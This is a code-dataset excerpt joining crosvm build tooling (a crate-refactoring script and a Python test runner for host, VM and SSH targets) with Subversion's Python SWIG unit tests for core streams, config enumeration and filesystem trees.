cc::Build::new()
.file("src/windows/stdio_fileno.c")
.compile("stdio_fileno");
}
"""
def main():
os.chdir(Path(__file__).parent.parent.parent)
subprocess.check_call(["git", "checkout", "-f", "--", "base"])
# Move crates to base
move_crate(Path("common/win_util"), Path("win_util"))
copy_crate_src_to_module("common/win_sys_util/src", "base/src/windows")
Path("base/build.rs").write_text(BUILD_RS)
# Load the added module
replace_in_file(Path("base/src/lib.rs"), "pub mod unix;", IMPORT)
# Flatten all imports for easier replacements
subprocess.check_call(
["rustfmt", "+nightly", "--config=imports_granularity=item", "base/src/lib.rs"]
)
# Update references to the above crates in base:
replace_in_files(
"base/src/**/*.rs",
[
("sys_util_core::", "crate::common::"),
("win_sys_util::", "crate::platform::"),
("crate::unix::", "crate::platform::"),
("use poll_token_derive::", "use base_poll_token_derive::"),
],
)
# Fixup macros since they like to have special treatement.
macros = [
"debug",
"error",
"handle_eintr_errno",
"info",
"ioctl_io_nr",
"ioctl_ior_nr",
"ioctl_iow_nr",
"ioctl_iowr_nr",
"syscall",
"warn",
"volatile_at_impl",
"volatile_impl",
"generate_scoped_event",
"syslog_lock",
"CHRONO_TIMESTAMP_FIXED_FMT",
]
for macro in macros:
# Update use statments. #[macro_export] exports them on the crate scoped
replace_in_files(
"base/src/windows/**/*.rs",
[
(f"crate::common::{macro}", f"crate::{macro}"),
(f"super::super::{macro}", f"crate::{macro}"),
(f"super::{macro}", f"crate::{macro}"),
],
)
# Replace $crate:: with $crate::windows (unless it's a macro invocation..)
def replace_references_in_macros(match: re.Match[str]):
name = match.group(0)
if not name.endswith("!"):
return name.replace("$crate", f"$crate::platform")
return name
replace_in_files(
f"base/src/windows/**/*.rs",
[(re.compile(r"([\w\*\_\$]+\:\:)+([\w\*\_\!]+)"), replace_references_in_macros)],
)
# Unflatten imports again
subprocess.check_call(
["rustfmt", "+nightly", "--config=imports_granularity=crate", "base/src/lib.rs"]
)
subprocess.check_call(["git", "rm", "-r", "common/win_sys_util", "common/win_util"])
main()
```
#### File: tools/impl/test_runner.py
```python
import argparse
import functools
import json
import os
import random
import subprocess
import sys
from multiprocessing import Pool
from pathlib import Path
from typing import Dict, Iterable, List, NamedTuple
import typing
import test_target
from test_target import TestTarget
import testvm
from test_config import CRATE_OPTIONS, TestOption, BUILD_FEATURES
from check_code_hygiene import (
has_platform_dependent_code,
has_crlf_line_endings,
)
USAGE = """\
Runs tests for crosvm locally, in a vm or on a remote device.
To build and run all tests locally:
$ ./tools/run_tests --target=host
To cross-compile tests for aarch64 and run them on a built-in VM:
$ ./tools/run_tests --target=vm:aarch64
The VM will be automatically set up and booted. It will remain running between
test runs and can be managed with `./tools/aarch64vm`.
Tests can also be run on a remote device via SSH. However it is your
responsiblity that runtime dependencies of crosvm are provided.
$ ./tools/run_tests --target=ssh:hostname
The default test target can be managed with `./tools/set_test_target`
To see full build and test output, add the `-v` or `--verbose` flag.
"""
Arch = test_target.Arch
# Print debug info. Overriden by -v
VERBOSE = False
# Timeouts for tests to prevent them from running too long.
TEST_TIMEOUT_SECS = 60
LARGE_TEST_TIMEOUT_SECS = 120
# Double the timeout if the test is running in an emulation environment, which will be
# significantly slower than native environments.
EMULATION_TIMEOUT_MULTIPLIER = 2
# Number of parallel processes for executing tests.
PARALLELISM = 4
CROSVM_ROOT = Path(__file__).parent.parent.parent.resolve()
COMMON_ROOT = CROSVM_ROOT / "common"
class ExecutableResults(object):
"""Container for results of a test executable."""
def __init__(self, name: str, success: bool, test_log: str):
self.name = name
self.success = success
self.test_log = test_log
class Executable(NamedTuple):
"""Container for info about an executable generated by cargo build/test."""
binary_path: Path
crate_name: str
cargo_target: str
kind: str
is_test: bool
is_fresh: bool
arch: Arch
@property
def name(self):
return f"{self.crate_name}:{self.cargo_target}"
class Crate(NamedTuple):
"""Container for info about crate."""
name: str
path: Path
def get_workspace_excludes(target_arch: Arch):
for crate, options in CRATE_OPTIONS.items():
if TestOption.DO_NOT_BUILD in options:
yield crate
elif TestOption.DO_NOT_BUILD_X86_64 in options and target_arch == "x86_64":
yield crate
elif TestOption.DO_NOT_BUILD_AARCH64 in options and target_arch == "aarch64":
yield crate
elif TestOption.DO_NOT_BUILD_ARMHF in options and target_arch == "armhf":
yield crate
def should_run_executable(executable: Executable, target_arch: Arch):
options = CRATE_OPTIONS.get(executable.crate_name, [])
if TestOption.DO_NOT_RUN in options:
return False
if TestOption.DO_NOT_RUN_X86_64 in options and target_arch == "x86_64":
return False
if TestOption.DO_NOT_RUN_AARCH64 in options and target_arch == "aarch64":
return False
if TestOption.DO_NOT_RUN_ARMHF in options and target_arch == "armhf":
return False
if TestOption.DO_NOT_RUN_ON_FOREIGN_KERNEL in options and target_arch != executable.arch:
return False
return True
def list_common_crates(target_arch: Arch):
excluded_crates = list(get_workspace_excludes(target_arch))
for path in COMMON_ROOT.glob("**/Cargo.toml"):
if not path.parent.name in excluded_crates:
yield Crate(name=path.parent.name, path=path.parent)
def exclude_crosvm(target_arch: Arch):
return "crosvm" in get_workspace_excludes(target_arch)
def cargo(
cargo_command: str, cwd: Path, flags: list[str], env: dict[str, str], build_arch: Arch
) -> Iterable[Executable]:
"""
Executes a cargo command and returns the list of test binaries generated.
The build log will be hidden by default and only printed if the build
fails. In VERBOSE mode the output will be streamed directly.
Note: Exits the program if the build fails.
"""
cmd = [
"cargo",
cargo_command,
"--message-format=json-diagnostic-rendered-ansi",
*flags,
]
if VERBOSE:
print("$", " ".join(cmd))
process = subprocess.Popen(
cmd,
cwd=cwd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True,
env=env,
)
messages: List[str] = []
# Read messages as cargo is running.
assert process.stdout
for line in iter(process.stdout.readline, ""):
# any non-json line is a message to print
if not line.startswith("{"):
if VERBOSE:
print(line.rstrip())
messages.append(line.rstrip())
continue
json_line = json.loads(line)
# 'message' type lines will be printed
if json_line.get("message"):
message = json_line.get("message").get("rendered")
if VERBOSE:
print(message)
messages.append(message)
# Collect info about test executables produced
elif json_line.get("executable"):
yield Executable(
Path(json_line.get("executable")),
crate_name=json_line.get("package_id", "").split(" ")[0],
cargo_target=json_line.get("target").get("name"),
kind=json_line.get("target").get("kind")[0],
is_test=json_line.get("profile", {}).get("test", False),
is_fresh=json_line.get("fresh", False),
arch=build_arch,
)
if process.wait() != 0:
if not VERBOSE:
for message in messages:
print(message)
sys.exit(-1)
def cargo_build_executables(
flags: list[str],
build_arch: Arch,
cwd: Path = Path("."),
env: Dict[str, str] = {},
) -> Iterable[Executable]:
"""Build all test binaries for the given list of crates."""
# Run build first, to make sure compiler errors of building non-test
# binaries are caught.
yield from cargo("build", cwd, flags, env, build_arch)
# Build all tests and return the collected executables
yield from cargo("test", cwd, ["--no-run", *flags], env, build_arch)
def build_common_crate(build_env: dict[str, str], build_arch: Arch, crate: Crate):
print(f"Building tests for: common/{crate.name}")
return list(cargo_build_executables([], build_arch, env=build_env, cwd=crate.path))
def build_all_binaries(target: TestTarget, build_arch: Arch):
"""Discover all crates and build them."""
build_env = os.environ.copy()
build_env.update(test_target.get_cargo_env(target, build_arch))
print("Building crosvm workspace")
yield from cargo_build_executables(
[
"--features=" + BUILD_FEATURES[build_arch],
"--verbose",
"--workspace",
*[f"--exclude={crate}" for crate in get_workspace_excludes(build_arch)],
],
build_arch,
cwd=CROSVM_ROOT,
env=build_env,
)
with Pool(PARALLELISM) as pool:
for executables in pool.imap(
functools.partial(build_common_crate, build_env, build_arch),
list_common_crates(build_arch),
):
yield from executables
def is_emulated(target: TestTarget, executable: Executable) -> bool:
if target.is_host:
# User-space emulation can run foreing-arch executables on the host.
return executable.arch != target.arch
elif target.vm:
return target.vm == "aarch64"
return False
def get_test_timeout(target: TestTarget, executable: Executable):
large = TestOption.LARGE in CRATE_OPTIONS.get(executable.crate_name, [])
timeout = LARGE_TEST_TIMEOUT_SECS if large else TEST_TIMEOUT_SECS
if is_emulated(target, executable):
return timeout * EMULATION_TIMEOUT_MULTIPLIER
else:
return timeout
def execute_test(target: TestTarget, executable: Executable):
"""
Executes a single test on the given test targed
Note: This function is run in a multiprocessing.Pool.
Test output is hidden unless the test fails or VERBOSE mode is enabled.
"""
options = CRATE_OPTIONS.get(executable.crate_name, [])
args: list[str] = []
if TestOption.SINGLE_THREADED in options:
args += ["--test-threads=1"]
# proc-macros and their tests are executed on the host.
if executable.kind == "proc-macro":
target = TestTarget("host")
if VERBOSE:
print(f"Running test {executable.name} on {target}...")
try:
# Pipe stdout/err to be printed in the main process if needed.
test_process = test_target.exec_file_on_target(
target,
executable.binary_path,
args=args,
timeout=get_test_timeout(target, executable),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
return ExecutableResults(
executable.name,
test_process.returncode == 0,
test_process.stdout,
)
except subprocess.TimeoutExpired as e:
# Append a note about the timeout to the stdout of the process.
msg = f"\n\nProcess timed out after {e.timeout}s\n"
return ExecutableResults(
executable.name,
False,
e.stdout.decode("utf-8") + msg,
)
def execute_all(
executables: list[Executable],
target: test_target.TestTarget,
repeat: int,
):
"""Executes all tests in the `executables` list in parallel."""
executables = [e for e in executables if should_run_executable(e, target.arch)]
if repeat > 1:
executables = executables * repeat
random.shuffle(executables)
sys.stdout.write(f"Running {len(executables)} test binaries on {target}")
sys.stdout.flush()
with Pool(PARALLELISM) as pool:
for result in pool.imap(functools.partial(execute_test, target), executables):
if not result.success or VERBOSE:
msg = "passed" if result.success else "failed"
print()
print("--------------------------------")
print("-", result.name, msg)
print("--------------------------------")
print(result.test_log)
else:
sys.stdout.write(".")
sys.stdout.flush()
yield result
print()
def find_crosvm_binary(executables: list[Executable]):
for executable in executables:
if not executable.is_test and executable.cargo_target == "crosvm":
return executable
raise Exception("Cannot find crosvm executable")
def main():
parser = argparse.ArgumentParser(usage=USAGE)
parser.add_argument(
"--verbose",
"-v",
action="store_true",
default=False,
help="Print all test output.",
)
parser.add_argument(
"--target",
help="Execute tests on the selected target. See ./tools/set_test_target",
)
parser.add_argument(
"--arch",
choices=typing.get_args(Arch),
help="Target architecture to build for.",
)
parser.add_argument(
"--build-only",
action="store_true",
)
parser.add_argument(
"--repeat",
type=int,
default=1,
help="Repeat each test N times to check for flakes.",
)
args = parser.parse_args()
global VERBOSE
VERBOSE = args.verbose # type: ignore
os.environ["RUST_BACKTRACE"] = "1"
target = (
test_target.TestTarget(args.target) if args.target else test_target.TestTarget.default()
)
print("Test target:", target)
build_arch = args.arch or target.arch
print("Building for architecture:", build_arch)
# Start booting VM while we build
if target.vm:
testvm.build_if_needed(target.vm)
testvm.up(target.vm)
hygiene, error = has_platform_dependent_code(Path("common/sys_util_core"))
if not hygiene:
print("Error: Platform dependent code not allowed in sys_util_core crate.")
print("Offending line: " + error)
sys.exit(-1)
crlf_endings = has_crlf_line_endings()
if crlf_endings:
print("Error: Following files have crlf(dos) line encodings")
print(*crlf_endings)
sys.exit(-1)
executables = list(build_all_binaries(target, build_arch))
if args.build_only:
print("Not running tests as requested.")
sys.exit(0)
# Upload dependencies plus the main crosvm binary for integration tests if the
# crosvm binary is not excluded from testing.
extra_files = (
[find_crosvm_binary(executables).binary_path] if not exclude_crosvm(build_arch) else []
)
test_target.prepare_target(target, extra_files=extra_files)
# Execute all test binaries
test_executables = [e for e in executables if e.is_test]
all_results = list(execute_all(test_executables, target, repeat=args.repeat))
failed = [r for r in all_results if not r.success]
if len(failed) == 0:
print("All tests passed.")
sys.exit(0)
else:
print(f"{len(failed)} of {len(all_results)} tests failed:")
for result in failed:
print(f" {result.name}")
sys.exit(-1)
if __name__ == "__main__":
try:
main()
except subprocess.CalledProcessError as e:
print("Command failed:", e.cmd)
print(e.stdout)
print(e.stderr)
sys.exit(-1)
``` |
{
"source": "0xgpapad/subversion",
"score": 2
} |
#### File: python/tests/core.py
```python
import unittest
import os
import tempfile
import sys
import svn.core, svn.client
import utils
class SubversionCoreTestCase(unittest.TestCase):
"""Test cases for the basic SWIG Subversion core"""
def test_SubversionException(self):
self.assertEqual(svn.core.SubversionException().args, ())
self.assertEqual(svn.core.SubversionException('error message').args,
('error message',))
self.assertEqual(svn.core.SubversionException(None, 1).args, (None, 1))
self.assertEqual(svn.core.SubversionException('error message', 1).args,
('error message', 1))
self.assertEqual(svn.core.SubversionException('error message', 1).apr_err,
1)
self.assertEqual(svn.core.SubversionException('error message', 1).message,
'error message')
def test_mime_type_is_binary(self):
self.assertEqual(0, svn.core.svn_mime_type_is_binary(b"text/plain"))
self.assertEqual(1, svn.core.svn_mime_type_is_binary(b"image/png"))
def test_mime_type_validate(self):
self.assertRaises(svn.core.SubversionException,
svn.core.svn_mime_type_validate, b"this\nis\ninvalid\n")
svn.core.svn_mime_type_validate(b"unknown/but-valid; charset=utf8")
def test_exception_interoperability(self):
"""Test if SubversionException is correctly converted into svn_error_t
and vice versa."""
t = utils.Temper()
(_, _, repos_uri) = t.alloc_empty_repo(suffix='-core')
rev = svn.core.svn_opt_revision_t()
rev.kind = svn.core.svn_opt_revision_head
ctx = svn.client.create_context()
class Receiver:
def __call__(self, path, info, pool):
raise self.e
rec = Receiver()
args = (repos_uri, rev, rev, rec, svn.core.svn_depth_empty, None, ctx)
try:
# ordinary Python exceptions must be passed through
rec.e = TypeError()
self.assertRaises(TypeError, svn.client.info2, *args)
# SubversionException will be translated into an svn_error_t, propagated
# through the call chain and translated back to SubversionException.
rec.e = svn.core.SubversionException("Bla bla bla.",
svn.core.SVN_ERR_INCORRECT_PARAMS,
file=__file__, line=866)
rec.e.child = svn.core.SubversionException("Yada yada.",
svn.core.SVN_ERR_INCOMPLETE_DATA)
self.assertRaises(svn.core.SubversionException, svn.client.info2, *args)
# It must remain unchanged through the process.
try:
svn.client.info2(*args)
except svn.core.SubversionException as exc:
# find the original exception
while exc.file != rec.e.file: exc = exc.child
self.assertEqual(exc.message, rec.e.message)
self.assertEqual(exc.apr_err, rec.e.apr_err)
self.assertEqual(exc.line, rec.e.line)
self.assertEqual(exc.child.message, rec.e.child.message)
self.assertEqual(exc.child.apr_err, rec.e.child.apr_err)
self.assertEqual(exc.child.child, None)
self.assertEqual(exc.child.file, None)
self.assertEqual(exc.child.line, 0)
# Incomplete SubversionExceptions must trigger Python exceptions, which
# will be passed through.
rec.e = svn.core.SubversionException("No fields except message.")
# e.apr_err is None but should be an int
self.assertRaises(TypeError, svn.client.info2, *args)
finally:
# This would happen without the finally block as well, but we expliticly
# order the operations so that the cleanup is not hindered by any open
# handles.
del ctx
t.cleanup()
def test_config_enumerate2(self):
cfg = svn.core.svn_config_create(False)
entries = {
b'one': b'one-value',
b'two': b'two-value',
b'three': b'three-value'
}
for (name, value) in entries.items():
svn.core.svn_config_set(cfg, b"section", name, value)
received_entries = {}
def enumerator(name, value, pool):
received_entries[name] = value
return len(received_entries) < 2
svn.core.svn_config_enumerate2(cfg, b"section", enumerator)
self.assertEqual(len(received_entries), 2)
for (name, value) in received_entries.items():
self.assertTrue(name in entries)
self.assertEqual(value, entries[name])
def test_config_enumerate2_exception(self):
cfg = svn.core.svn_config_create(False)
svn.core.svn_config_set(cfg, b"section", b"one", b"one-value")
svn.core.svn_config_set(cfg, b"section", b"two", b"two-value")
def enumerator(name, value, pool):
raise Exception
# the exception will be swallowed, but enumeration must be stopped
self.assertEqual(
svn.core.svn_config_enumerate2(cfg, b"section", enumerator), 1)
def test_config_enumerate_sections2(self):
cfg = svn.core.svn_config_create(False)
sections = [b'section-one', b'section-two', b'section-three']
for section in sections:
svn.core.svn_config_set(cfg, section, b"name", b"value")
received_sections = []
def enumerator(section, pool):
received_sections.append(section)
return len(received_sections) < 2
svn.core.svn_config_enumerate_sections2(cfg, enumerator)
self.assertEqual(len(received_sections), 2)
for section in received_sections:
self.assertTrue(section in sections)
def test_config_enumerate_sections2_exception(self):
cfg = svn.core.svn_config_create(False)
svn.core.svn_config_set(cfg, b"section-one", b"name", b"value")
svn.core.svn_config_set(cfg, b"section-two", b"name", b"value")
def enumerator(section, pool):
raise Exception
# the exception will be swallowed, but enumeration must be stopped
self.assertEqual(
svn.core.svn_config_enumerate_sections2(cfg, enumerator), 1)
def test_stream_from_stringbuf(self):
stream = svn.core.svn_stream_from_stringbuf(b'')
svn.core.svn_stream_close(stream)
stream = svn.core.svn_stream_from_stringbuf(b''.decode())
svn.core.svn_stream_close(stream)
stream = svn.core.svn_stream_from_stringbuf(None)
svn.core.svn_stream_close(stream)
def test_stream_read_full(self):
in_str = (b'Python\x00'
b'\xa4\xd1\xa4\xa4\xa4\xbd\xa4\xf3\r\n'
b'Subversion\x00'
b'\xa4\xb5\xa4\xd6\xa4\xd0\xa1\xbc\xa4\xb8\xa4\xe7\xa4\xf3\n'
b'swig\x00'
b'\xa4\xb9\xa4\xa6\xa4\xa3\xa4\xb0\r'
b'end')
stream = svn.core.svn_stream_from_stringbuf(in_str)
self.assertEqual(svn.core.svn_stream_read_full(stream, 4096), in_str)
svn.core.svn_stream_seek(stream, None)
self.assertEqual(svn.core.svn_stream_read_full(stream, 10), in_str[0:10])
svn.core.svn_stream_seek(stream, None)
svn.core.svn_stream_skip(stream, 20)
self.assertEqual(svn.core.svn_stream_read_full(stream, 4096), in_str[20:])
self.assertEqual(svn.core.svn_stream_read_full(stream, 4096), b'')
svn.core.svn_stream_close(stream)
def test_stream_read2(self):
# as we can't create non block stream by using swig-py API directly,
# we only test svn_stream_read2() behaves just same as
# svn_stream_read_full()
in_str = (b'Python\x00'
b'\xa4\xd1\xa4\xa4\xa4\xbd\xa4\xf3\r\n'
b'Subversion\x00'
b'\xa4\xb5\xa4\xd6\xa4\xd0\xa1\xbc\xa4\xb8\xa4\xe7\xa4\xf3\n'
b'swig\x00'
b'\xa4\xb9\xa4\xa6\xa4\xa3\xa4\xb0\r'
b'end')
stream = svn.core.svn_stream_from_stringbuf(in_str)
self.assertEqual(svn.core.svn_stream_read2(stream, 4096), in_str)
svn.core.svn_stream_seek(stream, None)
self.assertEqual(svn.core.svn_stream_read2(stream, 10), in_str[0:10])
svn.core.svn_stream_seek(stream, None)
svn.core.svn_stream_skip(stream, 20)
self.assertEqual(svn.core.svn_stream_read2(stream, 4096), in_str[20:])
self.assertEqual(svn.core.svn_stream_read2(stream, 4096), b'')
svn.core.svn_stream_close(stream)
@unittest.skipIf(not utils.IS_PY3 and utils.is_defaultencoding_utf8(),
"'utf-8' codecs of Python 2 accepts any unicode strings")
def test_stream_write_exception(self):
stream = svn.core.svn_stream_empty()
with self.assertRaises(TypeError):
svn.core.svn_stream_write(stream, 16)
# Check UnicodeEncodeError
# o1_str = b'Python\x00\xa4\xd1\xa4\xa4\xa4\xbd\xa4\xf3\r\n'
# ostr_unicode = o1_str.decode('ascii', 'surrogateescape')
ostr_unicode = (u'Python\x00'
u'\udca4\udcd1\udca4\udca4\udca4\udcbd\udca4\udcf3\r\n')
with self.assertRaises(UnicodeEncodeError):
svn.core.svn_stream_write(stream, ostr_unicode)
svn.core.svn_stream_close(stream)
# As default codec of Python 2 is 'ascii', conversion from unicode to bytes
# will be success only if all characters of target strings are in the range
# of \u0000 ~ \u007f.
@unittest.skipUnless(utils.IS_PY3 or utils.is_defaultencoding_utf8(),
"test ony for Python 3 or Python 2 'utf-8' codecs")
def test_stream_write_str(self):
o1_str = u'Python\x00\u3071\u3044\u305d\u3093\r\n'
o2_str = u'subVersioN\x00\u3055\u3076\u3070\u30fc\u3058\u3087\u3093'
o3_str = u'swig\x00\u3059\u3046\u3043\u3050\rend'
out_str = o1_str + o2_str + o3_str
rewrite_str = u'Subversion'
fd, fname = tempfile.mkstemp()
os.close(fd)
try:
stream = svn.core.svn_stream_from_aprfile2(fname, False)
self.assertEqual(svn.core.svn_stream_write(stream, out_str),
len(out_str.encode('UTF-8')))
svn.core.svn_stream_seek(stream, None)
self.assertEqual(svn.core.svn_stream_read_full(stream, 4096),
out_str.encode('UTF-8'))
svn.core.svn_stream_seek(stream, None)
svn.core.svn_stream_skip(stream, len(o1_str.encode('UTF-8')))
self.assertEqual(svn.core.svn_stream_write(stream, rewrite_str),
len(rewrite_str.encode('UTF-8')))
svn.core.svn_stream_seek(stream, None)
self.assertEqual(
svn.core.svn_stream_read_full(stream, 4096),
(o1_str + rewrite_str
+ o2_str[len(rewrite_str.encode('UTF-8')):]
+ o3_str ).encode('UTF-8'))
svn.core.svn_stream_close(stream)
finally:
try:
os.remove(fname)
except OSError:
pass
def test_stream_write_bytes(self):
o1_str = b'Python\x00\xa4\xd1\xa4\xa4\xa4\xbd\xa4\xf3\r\n'
o2_str = (b'subVersioN\x00'
b'\xa4\xb5\xa4\xd6\xa4\xd0\xa1\xbc\xa4\xb8\xa4\xe7\xa4\xf3\n')
o3_str = b'swig\x00\xa4\xb9\xa4\xa6\xa4\xa3\xa4\xb0\rend'
out_str = o1_str + o2_str + o3_str
rewrite_str = b'Subversion'
fd, fname = tempfile.mkstemp()
fname_bytes = fname if isinstance(fname, bytes) else fname.encode('UTF-8')
os.close(fd)
try:
stream = svn.core.svn_stream_from_aprfile2(fname_bytes, False)
self.assertEqual(svn.core.svn_stream_write(stream, out_str),
len(out_str))
svn.core.svn_stream_seek(stream, None)
self.assertEqual(svn.core.svn_stream_read_full(stream, 4096), out_str)
svn.core.svn_stream_seek(stream, None)
svn.core.svn_stream_skip(stream, len(o1_str))
self.assertEqual(svn.core.svn_stream_write(stream, rewrite_str),
len(rewrite_str))
svn.core.svn_stream_seek(stream, None)
self.assertEqual(
svn.core.svn_stream_read_full(stream, 4096),
o1_str + rewrite_str + o2_str[len(rewrite_str):] + o3_str)
svn.core.svn_stream_close(stream)
finally:
try:
os.remove(fname)
except OSError:
pass
def test_stream_readline(self):
o1_str = b'Python\t\xa4\xd1\xa4\xa4\xa4\xbd\xa4\xf3\r\n'
o2_str = (b'Subversion\t'
b'\xa4\xb5\xa4\xd6\xa4\xd0\xa1\xbc\xa4\xb8\xa4\xe7\xa4\xf3\n')
o3_str = b'swig\t\xa4\xb9\xa4\xa6\xa4\xa3\xa4\xb0\rend'
in_str = o1_str + o2_str + o3_str
stream = svn.core.svn_stream_from_stringbuf(in_str)
self.assertEqual(svn.core.svn_stream_readline(stream, b'\n'),
[o1_str[:-1], 0])
self.assertEqual(svn.core.svn_stream_readline(stream, b'\n'),
[o2_str[:-1], 0])
self.assertEqual(svn.core.svn_stream_readline(stream, b'\n'),
[o3_str, 1])
self.assertEqual(svn.core.svn_stream_readline(stream, b'\n'),
[b'', 1])
svn.core.svn_stream_seek(stream, None)
self.assertEqual(svn.core.svn_stream_readline(stream, b'\r\n'),
[o1_str[:-2], 0])
self.assertEqual(svn.core.svn_stream_readline(stream, b'\r\n'),
[o2_str + o3_str, 1])
svn.core.svn_stream_write(stream, b'\r\n')
svn.core.svn_stream_seek(stream, None)
self.assertEqual(svn.core.svn_stream_readline(stream, b'\r\n'),
[o1_str[:-2], 0])
self.assertEqual(svn.core.svn_stream_readline(stream, b'\r\n'),
[o2_str + o3_str, 0])
self.assertEqual(svn.core.svn_stream_readline(stream, b'\r\n'),
[b'', 1])
svn.core.svn_stream_close(stream)
@unittest.skipUnless(utils.IS_PY3 or utils.is_defaultencoding_utf8(),
"test ony for Python 3 or Python 2 'utf-8' codecs")
def test_stream_from_stringbuf_unicode(self):
"Check svn_stream_from_stringbuf() handle str on Python 3 correctly."
# instr_inicode = '(checkmark)UNICODE'
in_str_unicode = (u'\u2705\U0001F1FA\U0001F1F3\U0001F1EE'
u'\U0001F1E8\U0001F1F4\U0001F1E9\U0001F1EA')
stream = svn.core.svn_stream_from_stringbuf(in_str_unicode)
try:
self.assertEqual(svn.core.svn_stream_read_full(stream, 4096),
in_str_unicode.encode('utf-8'))
finally:
svn.core.svn_stream_close(stream)
def suite():
return unittest.defaultTestLoader.loadTestsFromTestCase(
SubversionCoreTestCase)
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
```
#### File: python/tests/fs.py
```python
import os, unittest, sys, errno
import os.path
from tempfile import mkstemp
from subprocess import Popen, PIPE
try:
# Python >=3.0
from urllib.parse import urljoin
except ImportError:
# Python <3.0
from urlparse import urljoin
from svn import core, repos, fs, client, delta
import utils
# Helper functions.
# brought from subversion/test/svn_test_fs.c
class SubversionTestTreeEntry:
def __init__(self, path, contents):
self.path = path
self.contents = contents
def svn_test__stream_to_string(stream):
ret_str = ''
while True:
rbuf = core.svn_stream_read_full(stream, 10)
if not rbuf:
return ret_str
if not isinstance(rbuf, str):
rbuf = rbuf.decode('utf-8')
ret_str += rbuf
def svn_test__set_file_contents(root, path, contents):
if not isinstance(contents, bytes):
contents = contents.encode('utf-8')
consumer_func, consumer_baton = fs.apply_textdelta(root, path, None, None)
delta.svn_txdelta_send_string(contents, consumer_func, consumer_baton)
return
def svn_test__get_file_contents(root, path):
return svn_test__stream_to_string(fs.file_contents(root, path))
def _get_dir_entries(root, path, tree_entries=None):
if tree_entries is None:
tree_entries = {}
bpath = path if isinstance(path, bytes) else path.encode('utf-8')
entries = fs.dir_entries(root, bpath)
# Copy this list to the master list with the path prepended to the names
for key in entries:
dirent = entries[key]
# Calculate the full path of this entry (by appending the name
# to the path thus far)
full_path = core.svn_dirent_join(bpath, dirent.name)
if not isinstance(full_path, str):
full_path = full_path.decode('utf-8')
# Now, copy this dirent to the master hash, but this time, use
# the full path for the key
tree_entries[full_path] = dirent
# If this entry is a directory, recurse int the tree.
if dirent.kind == core.svn_node_dir:
tree_entries = _get_dir_entries(root, full_path,
tree_entries=tree_entries)
return tree_entries
def _validate_tree_entry(root, path, contents):
# Verify that nod types are reported consistently.
kind = fs.check_path(root, path)
is_dir = fs.is_dir(root, path)
is_file = fs.is_file(root,path)
assert not is_dir or kind == core.svn_node_dir
assert not is_file or kind == core.svn_node_file
assert is_dir or is_file
# Verify that this is the expected type of node
if (not is_dir and contents is None) or (is_dir and contents is not None):
err_msg = "node '%s' in tree was of unexpected node type" % path
raise core.SubversionExcepton(err_msg, core.SVN_ERR_FS_GENERLL)
# Verify that the contents are as expected (files only)
if not is_dir:
# File lengths.
assert len(contents) == fs.file_length(root, path)
# Text contents.
rstream = fs.file_contents(root, path)
rstring = svn_test__stream_to_string(rstream)
if rstring != contents:
err_msg = "node '%s' in tree had unexpected contents" % path
raise core.SubversionExcepton(err_msg, core.SVN_ERR_FS_GENERLL)
return
VALIDATE_TREE_NA_NAME = "es-vee-en"
def svn_test__validate_tree(root, entries):
def format_entries(entries):
return " " + "\n ".join(entries) + "\n" if entries else ""
# There should be no entry with this name.
# Recursively get the whole tree
tree_entries = _get_dir_entries(root, "")
# Copy our list of expected_entries into dict
expected_entries = dict([(ent.path, ent) for ent in entries])
# For each entry in our EXPECTED_ENTRIES dict, try to find that
# entry in the TREE_ENTRIES dict given us by the FS. If we find
# that object, remove it from the TREE_ENTRIES. If we don't find
# it, there's a problem to report!
corrupt_entries = []
missing_entries = []
for key in expected_entries:
entry = expected_entries[key]
if key in tree_entries:
try:
epath = entry.path
if not isinstance(epath, str):
epath = epath.decode('utf-8')
econtents = entry.contents
if econtents is not None and not isinstance(econtents, str):
econtents = econtents.decode('utf-8')
_validate_tree_entry(root, epath, entry.contents)
except (SubversionException,AssertionError) as e:
# Append this entry name to the list of corrupt entries.
corrupt_entries.append(key)
del tree_entries[key]
else:
# Append this entry name to the list of missing entries.
missing_entries.append(key)
# Any entries still left in TREE_ENTRIES are extra ones that are
# not expected to be present. Assemble a string with their names.
extra_entries = list(tree_entries.keys())
# Test that non-existent paths will not be found.
# Skip this test if somebody sneakily added NA_NAME.
if expected_entries.get(VALIDATE_TREE_NA_NAME) is not None:
assert fs.check_path(root, VALIDATE_TREE_NA_NAME) == core.svn_node_none
assert not fs.is_file(root, VALIDATE_TREE_NA_NAME)
assert not fs.is_dir(root, VALIDATE_TREE_NA_NAME)
if missing_entries or extra_entries or corrupt_entries:
err_msg = ("Repository tree does not look as expected.\n"
"Corrupt entries:\n%s"
"Missing entries:\n%s"
"Extra entries:\n%s"
% tuple(map(format_entries,(corrupt_entries,
missing_entries,
extra_entries))))
raise core.SubversionException(err_msg, core.SVN_ERR_FS_GENERAL)
return
greek_tree_nodes = [
SubversionTestTreeEntry("iota", "This is the file 'iota'.\n" ),
SubversionTestTreeEntry("A", None ),
SubversionTestTreeEntry("A/mu", "This is the file 'mu'.\n" ),
SubversionTestTreeEntry("A/B", None ),
SubversionTestTreeEntry("A/B/lambda", "This is the file 'lambda'.\n" ),
SubversionTestTreeEntry("A/B/E", None ),
SubversionTestTreeEntry("A/B/E/alpha", "This is the file 'alpha'.\n" ),
SubversionTestTreeEntry("A/B/E/beta", "This is the file 'beta'.\n" ),
SubversionTestTreeEntry("A/B/F", None ),
SubversionTestTreeEntry("A/C", None ),
SubversionTestTreeEntry("A/D", None ),
SubversionTestTreeEntry("A/D/gamma", "This is the file 'gamma'.\n" ),
SubversionTestTreeEntry("A/D/G", None ),
SubversionTestTreeEntry("A/D/G/pi", "This is the file 'pi'.\n" ),
SubversionTestTreeEntry("A/D/G/rho", "This is the file 'rho'.\n" ),
SubversionTestTreeEntry("A/D/G/tau", "This is the file 'tau'.\n" ),
SubversionTestTreeEntry("A/D/H", None ),
SubversionTestTreeEntry("A/D/H/chi", "This is the file 'chi'.\n" ),
SubversionTestTreeEntry("A/D/H/psi", "This is the file 'psi'.\n" ),
SubversionTestTreeEntry("A/D/H/omega", "This is the file 'omega'.\n" )]
def svn_test__check_greek_tree(root):
# Loop through the list of files, checking for matching content.
for node in greek_tree_nodes:
if node.contents is not None:
rstream = fs.file_contents(root, node.path)
rstring = svn_test__stream_to_string(rstream)
if not isinstance(rstring, str):
rstring = rstring.decode('utf-8')
if rstring != node.contents:
raise core.SubversionException(
"data read != data written in file '%s'." % node.path,
core.SVN_ERR_FS_GENERAL)
return
